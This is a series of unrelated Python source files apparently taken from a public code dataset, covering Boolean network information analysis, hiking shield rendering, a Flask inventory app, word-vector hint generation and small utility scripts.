\n print(key, len(Basins[key]))\n \n return Basins\n\n\n\n\n\n\n#=============================================================================\n# SENSITIVITY FUNCTIONS\n#=============================================================================\n\ndef get_Hamming_neighbors(x):\n '''The input x is a binary list or tuple of length N. 
The function finds all N tuples y, \n that differ from x in exactly one position'''\n \n x = np.array(x)\n neighbors = []\n for i in range(len(x)):\n y = x.copy()\n y[i] = 1-x[i]\n neighbors.append(tuple(y))\n \n return neighbors\n\n\ndef Sensitivity(func_dict):\n ''' Calaculates the Sensitivity of a Boolean Function i.e the average number of changes in \n the output if one of the inputs changes\"\n '''\n S = np.zeros(len(func_dict.keys())) \n for x_idx, x in enumerate(func_dict.keys()): \n x_neighbors = get_Hamming_neighbors(x)\n S[x_idx] = sum([abs(func_dict[x]-func_dict[y])for y in x_neighbors])\n\n return np.mean(S)\n\n\ndef NetworkSensitivity(Net):\n ''' Calculates the Sensitivity of each node in a Boolean Network and returns the result as a dictionary\n where the keys are the nodeIDs and the values are the Sensitivity.\n '''\n Sens = {}\n for nodeID, node in Net.nodeDict.items(): \n Ninps = len(node.InputIDs)\n func_dict = {}\n inputs = list(product((0,1), repeat=Ninps))\n for inp in inputs: \n func_dict[inp] = node.UpdateFunc(inp)\n Sens[nodeID] = Sensitivity(func_dict)\n return Sens\n\n\n#=============================================================================\n# CANALYZING FUNCTIONS\n#=============================================================================\n\n\ndef is_canalyzing(func_dict):\n ''' checks if a Boolean function in dictionary format is canalzing and returns the index of the canalyzed variable.\n If the function is not canalyzing is_canalyzing will return -1'''\n \n Inputs = list(func_dict.keys())\n Ninps = len(Inputs[0])\n func_array = np.zeros((2**Ninps, Ninps+1))\n \n for inp_idx, inp in enumerate(Inputs): \n func_array[inp_idx, :Ninps] = inp\n func_array[inp_idx, Ninps] = func_dict[inp]\n #print(func_array)\n \n for k in range(Ninps): \n idx0 = np.where(func_array[:, k]==0)[0]\n idx1 = np.where(func_array[:, k]==1)[0]\n \n if (func_array[idx0, Ninps]==1).all() or (func_array[idx0, Ninps]==0).all(): \n return k\n \n elif (func_array[idx1, Ninps]==1).all() or (func_array[idx1, Ninps]==0).all(): \n return k\n \n return -1\n\ndef NetworkCanalyzing(Net):\n ''' Determines for each node in the network if its update function is canalyzing and returns a dictionary where the \n keys are the nodeIDs and the values are -1 if the update function is not canalyzing, or the index of the canalyzed varaible otherwise.\n '''\n Cana = {}\n for nodeID, node in Net.nodeDict.items(): \n Ninps = len(node.InputIDs)\n func_dict = {}\n inputs = list(product((0,1), repeat=Ninps))\n for inp in inputs: \n func_dict[inp] = node.UpdateFunc(inp)\n Cana[nodeID] = is_canalyzing(func_dict)\n return Cana\n\n#=============================================================================\n# CLUSTERING FUNCTIONS\n#=============================================================================\n\ndef find_clusters(Net): \n '''\n Finds clusters in the network by first calclating the attractor states and then finding sets of nodes that have low\n joint entropy. 
\n \n Output: list of tuples, where the first entry is a tuple of node indices and the second entry is the jount entropy\n '''\n\n a_start, a_stop = identify_attactors(Net)\n nodes = Net.NodeIDs\n # calculate the joint attaractor distribution\n d = dit.Distribution(a_start, [1/len(a_start)]*len(a_start))\n \n entropies = []\n clusters = []\n for pair in combinations(range(len(nodes)), 2): \n #find all pairs that have entropy lower than 1 \n H = dit.shannon.entropy(d.marginal(pair))\n if H <= 1: \n entropies.append((pair, dit.shannon.entropy(d.marginal(pair))))\n\n for pair in entropies: \n # successively add nodes to the pairs to find larger clausters with low entropy\n a = find_cluster_containing_pair(Net, a_start, pair[0])\n clusters.append(tuple(a[0][0]))\n clusters = list(set(clusters))\n \n return [(c, dit.shannon.entropy(d.marginal(c))) for c in clusters] \n\ndef find_cluster_containing_pair(Net, a_start, pair): \n '''\n This is a helper function for the find_clusters() function. The funtion takes a pair of nodes as input and \n successively adds other nodes to find larger clusters with low entropy. \n '''\n #pair is a list\n nodes = Net.NodeIDs\n d = dit.Distribution(a_start, [1/len(a_start)]*len(a_start))\n stop = False\n entropies = [tuple((pair, dit.shannon.entropy(d.marginal(pair))))]\n length_counter = 3\n \n while not stop: \n \n print('\\r Checking tuples of length: {} '.format(length_counter), end = '')\n tuple_ent = []\n for H_tuple_idx, H_tuple in enumerate(entropies): \n for idx in [x for x in range(len(nodes)) if x not in H_tuple[0]]: \n new_tup = [x for x in H_tuple[0]] \n new_tup.append(idx)\n new_tup.sort()\n \n H = dit.shannon.entropy(d.marginal(new_tup))\n if H <= 1: \n tuple_ent.append(tuple((tuple(new_tup), H)))\n \n if len(tuple_ent)== 0: \n stop = True\n return entropies\n \n else: \n length_counter += 1\n unique_tups = list(set([tuple(x[0]) for x in tuple_ent]))\n tuple_ent = [tuple((ut, dit.shannon.entropy(d.marginal(ut)))) for ut in unique_tups] \n entropies = tuple_ent\n\n\n\n#=============================================================================\n# DIRECTED INFORMATION ALL PAIRS \n# this is equivalent to mutual information\n#=============================================================================\ndef DI_matrix(net, FixedNodes={}, RemoveNodes=[]): \n ''' This function clauclated the directed information flow between all pairs of nodes unding \n the expression defined in Mathai et. 
al., 2007 As discussed in the repost, \n in Boolean networks of the sort generated with the BooleaNetwork class, \n this is equivalent to calculating the mutual infromation\n '''\n \n NodeIDs = [str(s) for s in net.nodeDict.keys()]\n N = len(NodeIDs)\n\n start, stop = net.calc_all_updates(rounds=1, FixedNodes=FixedNodes)\n YY={}\n X={}\n XYY={}\n\n\n NodeIDs_working=NodeIDs.copy()\n for x in RemoveNodes: \n NodeIDs_working.remove(x)\n \n normalizer = float(start.shape[0])\n\n for x in NodeIDs_working: \n i = NodeIDs.index(x)\n c = Counter(start[:,i])\n X[NodeIDs[i]]=[c[k]/normalizer for k in range(2)]\n\n Y1Y2 = start[:, i] + 2*stop[:, i]\n c = Counter(Y1Y2)\n YY[NodeIDs[i]]=[c[k]/normalizer for k in range(4)]\n\n for y in NodeIDs_working: \n j = NodeIDs.index(y)\n c = Counter(4*start[:, j]+Y1Y2)\n XYY[NodeIDs[i]+'_'+NodeIDs[j]] = [c[k]/normalizer for k in range(8)]\n\n DI_Matrix = np.zeros((len(NodeIDs_working),len(NodeIDs_working)))\n MI_Matrix = DI_Matrix\n\n for i, node_i in enumerate(NodeIDs_working): \n for j, node_j in enumerate(NodeIDs_working): \n #MI_Matrix[i, j] = em.MutualInformation(pairs[node_i+'_'+node_j], singlesX[node_i], singlesY[node_j])\n DI_Matrix[i, j] = em.Entropy(YY[node_j])+em.Entropy(X[node_i])-em.Entropy(XYY[NodeIDs_working[j]+'_'+NodeIDs_working[i]])\n\n for i in range(len(NodeIDs_working)):\n DI_Matrix[i, i] = -100\n \n return DI_Matrix\n\n\ndef calc_mutual_information(self, X, Y, shift, verbose=False):\n '''\n Calculate Mutual Information between two nodes. \n\n X,Y....... Ids of the nodes between which MI should be calculated\n shift..... temporal distance between X and Y\n '''\n x_idx = list(Net.nodeDict.keys()).index(X)\n y_idx = list(Net.nodeDict.keys()).index(Y)\n\n start, stop = Net.calc_all_updates(rounds=max(1, shift))\n\n if shift==0: \n XX = stop[:, x_idx]\n YY = stop[:, y_idx]\n else: \n XX = start[:, x_idx]\n YY = stop[:, y_idx]\n\n px = [1- np.mean(XX), np.mean(XX)]\n py = [1- np.mean(YY), np.mean(YY)]\n\n c = Counter(XX+2*YY)\n p_joint = np.array([c[k] for k in range(4)])\n p_joint = p_joint/sum(p_joint)\n mi = em.MutualInformation(p_joint, px, py)\n #p_joint = [len(np.where(XX+YY==2)[0]), len(np.where(XX-YY==1)[0]), len(np.where(YY-XX==1)[0]), len(np.where(XX+YY==0)[0])]\n #p_joint = np.array(p_joint)/float(len(XX))\n\n if verbose: \n print(\"px = \\t{}\".format(px))\n print(\"py = \\t{}\".format(py))\n print(\"pxy = \\t{}\".format(p_joint))\n\n print(\"MI = {}\".format(mi))\n\n return mi\n\ndef calc_mutual_information_all_pairs(Net, rounds=1, plot=True, save_name='',RemoveNodes=[]): \n '''\n Calculates all updates for as many steps as specified by the rounds parameter. The claucluates mutual information\n at subsequent timesteps between all pairs of nodes independent of wheteher or not they are directly connected. 
\n If the plot parameter is set to true, an imshow plot will be produced from the the result matrix.\n '''\n\n NodeIDs = list(Net.nodeDict.keys())\n NodeIDs_working = NodeIDs\n for x in RemoveNodes: \n NodeIDs_working.remove(x)\n\n N = len(NodeIDs_working)\n MIs = np.zeros((N,N))\n start, stop = Net.calc_all_updates(rounds=max(1, rounds))\n if rounds==0: \n start=stop\n\n for idx_i, node_i in enumerate(NodeIDs_working):\n for idx_j, node_j in enumerate(NodeIDs_working):\n\n XX = start[:, idx_i]\n YY = stop[:, idx_j]\n px = [1- np.mean(XX), np.mean(XX)]\n py = [1- np.mean(YY), np.mean(YY)] \n p_joint = [len(np.where(XX+YY==2)[0]), len(np.where(XX-YY==1)[0]), len(np.where(YY-XX==1)[0]), len(np.where(XX+YY==0)[0])]\n\n p_joint = np.array(p_joint)/float(len(XX))\n MIs[idx_i, idx_j] = em.MutualInformation(p_joint, px, py)\n\n if plot: \n #plt.figure(figsize=(5,5)) \n plt.imshow(MIs, aspect='auto')\n plt.xticks(np.arange(0, N,1), list(NodeIDs_working), rotation=90) \n plt.yticks(np.arange(0, N,1), list(NodeIDs_working)) \n plt.ylabel(\"t\", rotation=0, size=20)\n plt.xlabel(\"t+{}\".format(rounds), size=20)\n plt.colorbar()\n\n minor_locator = AutoMinorLocator(2)\n plt.gca().xaxis.set_minor_locator(minor_locator)\n plt.gca().yaxis.set_minor_locator(minor_locator)\n plt.grid(which='minor')\n\n if len(save_name)>0: \n plt.savefig(save_name)\n return MIs\n\n\n\n#=============================================================================\n# INFORMATION FLOW FUNCTIONS\n#=============================================================================\n\ndef get_parent_child_tuples(Net, Ninps):\n '''\n Finds all subsets of nodes where Ninps inputs feed into one output. \n In particular, when a node has more than Ninps inputs, all relevant subgroups of inputs will be returned.\n '''\n tuples = []\n for node in Net.nodeDict:\n parents = Net.nodeDict[node].InputIDs\n if len(parents) < Ninps: \n parent_combinations=[]\n else:\n parent_combinations = list(combinations(parents, r=Ninps))\n\n for pc in parent_combinations: \n tuples.append((list(pc), [node]))\n return tuples\n\n\ndef info_flow_in_tuples_and_triplets(Net, Ninps):\n ''' Calculates the information flow within pairs and triplets of nodes. \n If Ninps = 1 the function will find all nodes with at least one input and calculate \n the mutual information between input and output.\n If Ninps = 2 the fnction will find all nodes with at least 2 inputs and calculates mutual information and \n information decompostion between parents and child. 
\n '''\n \n if Ninps not in [1,2]:\n print('number of inputs can only be 1 or 2')\n return \n\n if Ninps == 1:\n tuples = get_parent_child_tuples(Net, 1)\n \n if not type(tuples[0][0][0]).__name__ == 'int': \n tuples_new = []\n IDs = list(Net.nodeDict.keys())\n for tup in tuples: \n tuples_new.append(tuple([[IDs.index(tup[0][0])],[IDs.index(tup[1][0])]]))\n tuples = tuples_new\n \n print('Calculating info flow for {} pairs....'.format(len(tuples)))\n start, stop = Net.calc_all_updates()\n mi = []\n \n for tup in tuples: \n states = [(start[i,tup[0][0]], stop[i,tup[1][0]]) for i in range(start.shape[0])]\n c = Counter(states)\n unique_states = list(c.keys())\n state_probs = np.array(list(c.values()))\n dist = dit.Distribution(unique_states, state_probs/sum(state_probs))\n \n mi.append(dit.shannon.mutual_information(dist, [0],[1]))\n return mi\n\n \n if Ninps == 2:\n tuples = get_parent_child_tuples(Net, 2)\n print('Calculating info flow for {} triplets....'.format(len(tuples)))\n\n if not type(tuples[0][0][0]).__name__ == 'int': \n tuples_new = []\n IDs = list(Net.nodeDict.keys())\n for tup in tuples: \n tuples_new.append(tuple([[IDs.index(tup[0][0]), IDs.index(tup[0][1])],[IDs.index(tup[1][0])]]))\n tuples = tuples_new\n \n \n start, stop = Net.calc_all_updates()\n syn = []\n red = []\n unique = []\n mi = []\n mi_pair = []\n\n for tup in tuples: \n states = [(start[i,tup[0][0]], start[i,tup[0][1]], stop[i,tup[1][0]]) for i in range(start.shape[0])]\n c = Counter(states)\n unique_states = list(c.keys())\n state_probs = np.array(list(c.values()))\n dist = dit.Distribution(unique_states, state_probs/sum(state_probs))\n a = dit.pid.PID_BROJA(dist)\n\n syn.append(a.get_partial(((0, 1),)))\n red.append(a.get_partial(((0,), (1,))))\n unique.append(a.get_partial(((0,),)))\n unique.append(a.get_partial(((1,),)))\n mi.append(dit.shannon.mutual_information(dist, [0],[2]))\n mi.append(dit.shannon.mutual_information(dist, [1],[2]))\n mi_pair.append(dit.shannon.mutual_information(dist, [0,1],[2]))\n \n return syn, red, unique, mi, mi_pair\n return syn, red, unique, mi, mi_pair\n\n\ndef info_decomposition_clusters(Net, InputsX, InputsY, Outputs, set_names=False):\n ''' \n Calculates information decomposition and mutual information between subgroups of nodes. 
\n For this the subgroups are first reduced to triplets by calculating the joint dirstribution of all\n nodes in a subgroup\n '''\n res, dist = prepare_cluster_distribution(Net, InputsX, InputsY, Outputs, set_names=False)\n\n pid = dit.pid.PID_BROJA(dist)\n\n uni0 = pid.get_partial(((0,),))\n uni1 = pid.get_partial(((1,),))\n syn = pid.get_partial((((0, 1),)))\n red = pid.get_partial((((0,), (1,))))\n\n mi = dit.shannon.mutual_information(dist, [0,1],[2])\n mi0 = dit.shannon.mutual_information(dist, [0],[2])\n mi1 = dit.shannon.mutual_information(dist, [1],[2])\n\n return {'UNI0':uni0, 'UNI1':uni1, 'SYN':syn, 'RED':red, 'MI0':mi0, 'MI1':mi1, 'MI':mi}\n\n\ndef prepare_cluster_distribution(Net, InputsX, InputsY, Outputs, set_names=False): \n '''Generates a dit Distribution of three random varaibles where each varaible represents a group of N>=1 original varaibles.'''\n start, stop = Net.calc_all_updates()\n Nodes = list(Net.nodeDict.keys())\n M = start.shape[0]\n \n inpX = np.zeros(M)\n for node_idx, node in enumerate(InputsX): \n inpX+= (node_idx+1)*start[:,Nodes.index(node)]\n \n inpY = np.zeros(M)\n for node_idx, node in enumerate(InputsY): \n inpY+= (node_idx+1)*start[:,Nodes.index(node)] \n \n outp = np.zeros(M)\n for node_idx, node in enumerate(Outputs): \n outp+= (node_idx+1)*stop[:,Nodes.index(node)] \n \n res = np.vstack((np.vstack((inpX, inpY)), outp))\n res = [tuple(res[:, i].astype(int)) for i in range(M)]\n c = Counter(res)\n states = list(c.keys())\n probs = list(c.values())\n d = dit.Distribution(states, [p/sum(probs) for p in probs])\n \n if set_names:\n d.set_rv_names([\"Inp1\",\"Inp2\",\"Outp\" ])\n \n return res, d\n\n\n\n#=============================================================================\n# PLOT FUNCTIONS\n#=============================================================================\ndef make_state_diagram(BooleanNetwork, FixedNodes={}, savename='', return_graph=False):\n '''\n Calculates all macro states of a Boolean network and their relationship. The resulting set of states \n is represented as a graph where node A is a parent of node B when one updating \n step leads from macro-state A to macro-state B. 
\n '''\n N = len(BooleanNetwork.nodeDict)-len(FixedNodes) # number of varying nodes\n names = [node_name for node_name in BooleanNetwork.nodeDict.keys() if not node_name in FixedNodes.keys()]\n start_values = list(product(range(2), repeat=N))\n \n G=nx.DiGraph()\n G.add_nodes_from(start_values)\n value_dict = FixedNodes # empty is nothing is fixed, containing fixed nodes otherwise\n \n for sv_idx, sv in enumerate(start_values): \n print(sv_idx/len(start_values), end='\\r')\n value_dict = {x:sv[i] for i, x in enumerate(names)}\n BooleanNetwork.assign_values_to_nodes(value_dict)\n \n start = tuple(BooleanNetwork.CurrentValues.values())\n BooleanNetwork.update_all()\n stop = tuple(BooleanNetwork.CurrentValues.values())\n G.add_edge(start, stop)\n #return G \n \n print('\\nwaiting for plot')\n pos = nx.planar_layout(G, scale=2)\n #pos = nx.kamada_kawai_layout(G, scale=100)\n #pos = nx.spiral_layout(G)\n labels = {a:''.join(tuple(map(str , a ))) for a in start_values}\n #nx.draw_networkx(G, pos=pos, node_color='thistle',node_shape='s',node_size=800,labels=labels,\n #edge_color='black', font_weight='bold', arrowprops=dict(arrowstyle=\"->\", max_arrow_width=0.3))\n nx.draw_networkx(G, pos=pos, node_color='thistle', node_size=300,labels=labels,\n edge_color='black' , arrowprops=dict(arrowstyle=\"->\", max_arrow_width=0.3))\n plt.axis(\"off\")\n\n if len(savename)>0: \n plt.savefig(savename) \n if return_graph: \n return G\n \n \n \ndef make_attractor_graph(Net, draw =True): \n '''Identifies the attractors of a Boolean network and generates a graph representinng theri relations'''\n a_start, a_stop = identify_attactors(Net)\n G = nx.DiGraph()\n G.add_nodes_from(a_start)\n G.add_edges_from([a_start[i],a_stop[i]] for i in range(len(a_start)))\n pos = generate_positions(G)\n\n if draw: \n nx.draw_networkx_nodes(G, pos=pos, node_size=300, node_color='lightgrey')\n nx.draw_networkx_edges(G, pos=pos )\n nx.draw_networkx_labels(G, pos=pos, labels={a:tup2str(a) for a in a_stop} )\n plt.axis('off')\n \n return G\n# =============================================================================\n","repo_name":"ClaudiaWinklmayr/BooleanNetworksOfGRN","sub_path":"python_files/boolean_net_functions.py","file_name":"boolean_net_functions.py","file_ext":"py","file_size_in_byte":23814,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"5674361681","text":"import re\nimport gi\ngi.require_version('Rsvg', '2.0')\nfrom gi.repository import Rsvg\nimport os\n\nfrom ..common.tags import Tags\nfrom ..common.config import ShieldConfig\nfrom ..common.shield_maker import ShieldMaker\n\nclass KctSymbol(ShieldMaker):\n \"\"\" A shield with hiking shields as used by the Czech and Slovakian\n hiking clubs.\n See https://wiki.openstreetmap.org/wiki/Key:kct_red.\n \"\"\"\n\n def __init__(self, color, symbol, config):\n self.config = config\n self.uuid_pattern = f'kct_{{}}_{color}-{symbol}'\n self.color = color\n self.symbol = symbol\n\n def dimensions(self):\n bwidth = self.config.image_border_width or 0\n return (int((self.config.image_width or 16) + 0.5 * bwidth),\n int((self.config.image_height or 16) + 0.5 * bwidth))\n\n def render(self, ctx, w, h):\n # get the template file\n content = self.find_resource(self.config.kct_path, f'{self.symbol}.svg').decode('utf8')\n # patch in the correct color\n fgcol = tuple([int(x*255) for x in self.config.kct_colors[self.color]])\n color = '#%02x%02x%02x' % fgcol\n content = re.sub('#eeeeee', color, content)\n # now read in by cairo\n 
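# Rsvg parses the recolored SVG from memory; get_dimensions() below reports its intrinsic size\n        # so the cairo context can be scaled from that size to the requested shield size.\n        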
svg = Rsvg.Handle.new_from_data(content.encode())\n dim = svg.get_dimensions()\n\n ctx.scale(w/dim.width, h/dim.height)\n svg.render_cairo(ctx)\n\n\ndef create_for(tags: Tags, region: str, config: ShieldConfig):\n if config.kct_colors is None or config.kct_types is None:\n return None\n\n # slovakian system\n if tags.get('operator', '').lower() == 'kst':\n col = tags.get('colour')\n sym = tags.get('symbol')\n if col in config.kct_colors and sym in config.kct_types:\n return KctSymbol(col, sym, config)\n\n # Czech system\n tag = tags.starting_with('kct_')\n if tag is not None and tag.k[4:] in config.kct_colors and tag.v in config.kct_types:\n return KctSymbol(tag.k[4:], tag.v, config)\n\n return None\n","repo_name":"waymarkedtrails/waymarkedtrails-shields","sub_path":"wmt_shields/styles/kct_symbol.py","file_name":"kct_symbol.py","file_ext":"py","file_size_in_byte":2002,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"19"} +{"seq_id":"33880372737","text":"from flask import Flask, render_template, request, url_for, redirect, flash\nimport os\nfrom forms import ProductForm, ProductSaleForm\nfrom models import products, new_product\n\n\napp = Flask(__name__)\napp.secret_key = os.urandom(24)\n\n\n@app.route('/')\ndef mainpage():\n return render_template(\"mainpage.html\")\n\n\n@app.route('/dashboard', methods=[\"GET\", \"POST\"])\ndef add_product():\n ITEMS = products.all()\n product_form = ProductForm()\n if request.method == \"POST\":\n if request.form[\"btn\"] == \"Add Product\":\n if product_form.validate_on_submit():\n product = new_product.create(product_form.data)\n ITEMS = products.add(product)\n\n if request.form[\"btn\"] == \"Export Products\":\n products.export()\n if request.form[\"btn\"] == \"Load Products\": \n ITEMS = products.load()\n\n return render_template(\"add_product.html\", product_form=product_form, product_list=ITEMS)\n\n@app.route('/sell/', methods=[\"GET\", \"POST\"])\ndef sell_product(product_name):\n ITEMS = products.all()\n product_sale_form = ProductSaleForm()\n if request.method == \"POST\":\n if product_sale_form.validate_on_submit():\n if product_name in ITEMS:\n quantity = product_sale_form.data['sold_quantity']\n ITEMS = products.sell(product_name, quantity)\n return redirect(url_for('add_product'))\n return render_template(\"sell_product.html\", product_sale_form=product_sale_form)\n\n\nif __name__ == '__main__':\n app.run(debug=True)","repo_name":"AnnaOstoj/Projekt_Magazyn","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"2734772722","text":"# gensim monkeypatch\nimport collections.abc\n\ncollections.Mapping = collections.abc.Mapping\n\nfrom functools import partial\nimport pickle\n\nimport gensim.models.keyedvectors as word2vec\n\nimport math\n\nimport heapq\nimport json\n\nimport os\n\nfrom numpy import dot\nfrom numpy.linalg import norm\n\nimport re\nimport tqdm.contrib.concurrent\n\nfrom hashlib import sha1\n\nimport code, traceback, signal\n\n# check against all words + phrases in model?\nALL_WORDS = False\n\n\nmodel = word2vec.KeyedVectors.load_word2vec_format(\n \"../swectors-300dim.vec\", binary=False\n)\n\n\ndef make_words():\n words = []\n for word in model.key_to_index:\n words.append(word)\n\n return words\n\n\nwords = make_words()\n\n\ndef debug(sig, frame):\n \"\"\"Interrupt running process, and provide a python prompt for\n interactive debugging.\"\"\"\n d 
= {\"_frame\": frame} # Allow access to frame object.\n d.update(frame.f_globals) # Unless shadowed by global\n d.update(frame.f_locals)\n\n i = code.InteractiveConsole(d)\n message = \"Signal received : entering python shell.\\nTraceback:\\n\"\n message += \"\".join(traceback.format_stack(frame))\n i.interact(message)\n\n\ndef find_hints(secret, progress=True):\n if progress: # works poorly in parellel\n worditer = tqdm.tqdm(words, leave=False)\n else:\n worditer = words\n\n target_vec = model[secret]\n target_vec_norm = norm(target_vec)\n\n # syns = synonyms.get(secret) or []\n nearest = []\n reg = re.compile(\".*\\d.*\")\n\n for word in worditer:\n vec = model[word]\n # why not model.wv.similarity(wordA, wordB)?\n similarity = dot(vec, target_vec) / (norm(vec) * target_vec_norm)\n heapq.heappush(nearest, (similarity, word))\n if len(nearest) > 1000 or reg.match(word):\n heapq.heappop(nearest)\n nearest.sort()\n return secret, nearest\n\n\nif __name__ == \"__main__\":\n signal.signal(signal.SIGUSR1, debug) # Register handler\n\n # synonyms = {}\n\n # with open(\"moby/words.txt\") as moby:\n # for line in moby.readlines():\n # line = line.strip()\n # words = line.split(\",\")\n # word = words[0]\n # synonyms[word] = set(words)\n\n print(\"loaded moby...\")\n\n hints = {}\n\n secrets = [] # to have length for progress bar\n\n with open(\"static/assets/js/secretWords.js\", encoding=\"utf-8\") as f:\n for line in f.readlines():\n line = line.strip()\n if not '\"' in line:\n continue\n secrets.append(line.strip('\",'))\n\n CONCURRENCY = True\n if CONCURRENCY:\n # may need to limit concurrency for memory reasons\n # XXX bug: wraps all results into a list, e.g. won't write any until the very end\n mapper = tqdm.contrib.concurrent.process_map(\n partial(find_hints, progress=False),\n secrets,\n max_workers=(os.cpu_count() + 4),\n chunksize=1,\n total=len(secrets),\n )\n else:\n mapper = tqdm.tqdm(\n (find_hints(secret) for secret in secrets), total=len(secrets)\n )\n\n with open(\"hints.json\", \"w+\") as hints_file:\n for secret, nearest in mapper:\n nearest = [(float(score), word) for score, word in nearest]\n hints_file.write(json.dumps({\"word\": secret, \"neighbors\": nearest}))\n hints_file.write(\"\\n\")\n hints_file.flush()\n hints[secret] = nearest\n\n with open(b\"nearest.pickle\", \"wb\") as f:\n pickle.dump(hints, f)\n","repo_name":"BionicRiddle/swemantle","sub_path":"dump-hints.py","file_name":"dump-hints.py","file_ext":"py","file_size_in_byte":3496,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"19"} +{"seq_id":"37988113201","text":"import os\nfrom nevow import loaders\nfrom nevow import athena\n\n# Import PyMh files and modules.\nfrom Modules.Computer import logging_pyh as Logger\n\n# Handy helper for finding external resources nearby.\nwebpath = os.path.join(os.path.split(__file__)[0])\ntemplatepath = os.path.join(webpath, 'template')\n\ng_debug = 0\nLOG = Logger.getLogger('PyHouse.webRootMenu ')\n\n\nclass RootMenuElement(athena.LiveElement):\n \"\"\"\n \"\"\"\n docFactory = loaders.xmlfile(os.path.join(templatepath, 'rootMenuElement.html'))\n jsClass = u'rootMenu.RootMenuWidget'\n\n def __init__(self, p_workspace_obj):\n self.m_pyhouse_obj = p_workspace_obj.m_pyhouse_obj\n\n @athena.expose\n def doRootMenuReload(self, p_json):\n \"\"\" Process a message for a XML save/reload from the browser/client.\n \"\"\"\n LOG.info(\"Self: {}\".format(self))\n self.m_pyhouse_obj.APIs.PyHouseMainAPI.SaveXml(self.m_pyhouse_obj)\n\n 
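# The quit handler below only logs the browser's logoff request; no shutdown logic is attached here.\n    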
@athena.expose\n def doRootMenuQuit(self, p_json):\n \"\"\" Process a message for a browser logoff and quit that came from the browser/client.\n \"\"\"\n LOG.info(\"Self: {0:}; JSON: {1:}\".format(self, p_json))\n\n# ## END DBK\n","repo_name":"LyleH/PyHouse_1","sub_path":"src/Modules/Web/web_rootMenu.py","file_name":"web_rootMenu.py","file_ext":"py","file_size_in_byte":1162,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"5665756295","text":"import torch\nimport torch.nn as nn\nimport numpy as np\nfrom ipdb import set_trace\n\nclass DepthFunction(torch.autograd.Function):\n\n @staticmethod\n def forward(ctx, *input):\n ray0, ray_direction, d_pred, p_pred, local_latent, global_latent, decoder, mask = input[:8]\n ctx.save_for_backward(ray0, ray_direction, d_pred, p_pred, local_latent, global_latent)\n ctx.decoder = decoder\n ctx.mask = mask\n return d_pred\n\n @staticmethod\n def backward(ctx, grad_output):\n ray0, ray_direction, d_pred, p_pred, local_latent, global_latent = ctx.saved_tensors\n decoder = ctx.decoder\n mask = ctx.mask\n eps = 1e-3\n\n with torch.enable_grad():\n p_pred.requires_grad = True\n # set_trace()\n f_p, _, _ = decoder(p_pred.permute(1,0,2), local_latent, ray_dirs=None, return_occupancy=True,return_feature_vec=False, return_rgb=False, global_latent=global_latent) \n f_p_sum = f_p.sum()\n grad_p = torch.autograd.grad(f_p_sum, p_pred, retain_graph=True)[0]\n grad_p_dot_v = (grad_p * ray_direction).sum(-1)\n\n if mask.sum() > 0:\n grad_p_dot_v[mask == 0] = 1.\n # Sanity\n grad_p_dot_v[abs(grad_p_dot_v) < eps] = eps\n grad_outputs = -grad_output.squeeze(-1)\n grad_outputs = grad_outputs / grad_p_dot_v\n grad_outputs = grad_outputs * mask.float()\n\n # Gradients for latent code\n if local_latent is None or local_latent.shape[-1] == 0 or mask.sum() == 0:\n gradLatent = None\n else:\n gradLatent = torch.autograd.grad(f_p.squeeze(1).permute(1,0), local_latent, retain_graph=True,\n grad_outputs=grad_outputs)[0]\n\n # Gradients for network parameters phi\n if mask.sum() > 0:\n # set_trace()\n # Accumulates gradients weighted by grad_outputs variable\n grad_phi = torch.autograd.grad(\n f_p.squeeze(1).permute(1,0), [k for k in decoder.parameters()],\n grad_outputs=grad_outputs, retain_graph=True, allow_unused= True)\n else:\n grad_phi = [None for i in decoder.parameters()]\n\n # Return gradients for latent, z, and network parameters and None\n # for all other inputs\n out = [None, None, None, None, None, None, None, None] + list(grad_phi)\n return tuple(out)\n","repo_name":"CoolChameleon/SH3D","sub_path":"pytorch3d/implicitron/models/multisurf/src/rendUtils/depthFunc.py","file_name":"depthFunc.py","file_ext":"py","file_size_in_byte":2523,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"44068328269","text":"class Solution:\n def maxSumAfterPartitioning(self, A: List[int], K: int) -> int:\n N = len(A)\n dp = [0]*(N+1)\n maxVal = {} \n for i in range(N+1):\n for j in range(1, K+1):\n if j<=i:\n if (i,j) not in maxVal: \n maxVal[i,j] = max((A[m] for m in range(i-j, i)))\n newVal = dp[i-j] + j * maxVal[i,j]\n # print(newVal)\n if newVal > dp[i]: dp[i] = newVal\n # print(dp)\n return dp[-1]\n","repo_name":"arw2019/AlgorithmsDataStructures","sub_path":"Partition Array for Maximum 
Sum/Leetcode_1043.py","file_name":"Leetcode_1043.py","file_ext":"py","file_size_in_byte":546,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"22113072648","text":"#!/bin/env python\n\nimport urllib\n\nPROFANITY_URL = \"http://www.wdyl.com/profanity?q=%s\"\n\ndef read_text():\n quotes = open(\"./movie_quotes.txt\")\n contents = quotes.read()\n quotes.close()\n check_profanity(contents)\n\ndef check_profanity(text_to_check):\n query = PROFANITY_URL % text_to_check\n connection = urllib.urlopen(query)\n output = connection.read()\n connection.close()\n if \"true\" in output:\n print(\"Profanity Alert!!!\")\n elif \"false\" in output:\n print(\"This document has no curse words!\")\n else:\n print(\"Could not scan the document properly.\")\n\n\nif __name__ == \"__main__\":\n read_text()","repo_name":"motasmarcelo/udacity-programming-foundations","sub_path":"lesson_2c/check_profanity.py","file_name":"check_profanity.py","file_ext":"py","file_size_in_byte":644,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"37261245445","text":"import configparser\nimport os\nimport getopt\nimport sys\nfrom string import Template\n\ndef usage():\n print (\"Usage: \" + sys.argv[0] +\" --config config_file_name\\n\")\n\n print (\"Example:\")\n print (\"\\t\" + sys.argv[0] +\" --config ../../config/config.properties\")\n sys.exit(1)\n\ndef read_properties_file(prop_file):\n with open(prop_file, 'r') as f:\n config_string = '[config_section]\\n' + f.read()\n config = configparser.ConfigParser()\n config.read_string(config_string)\n return 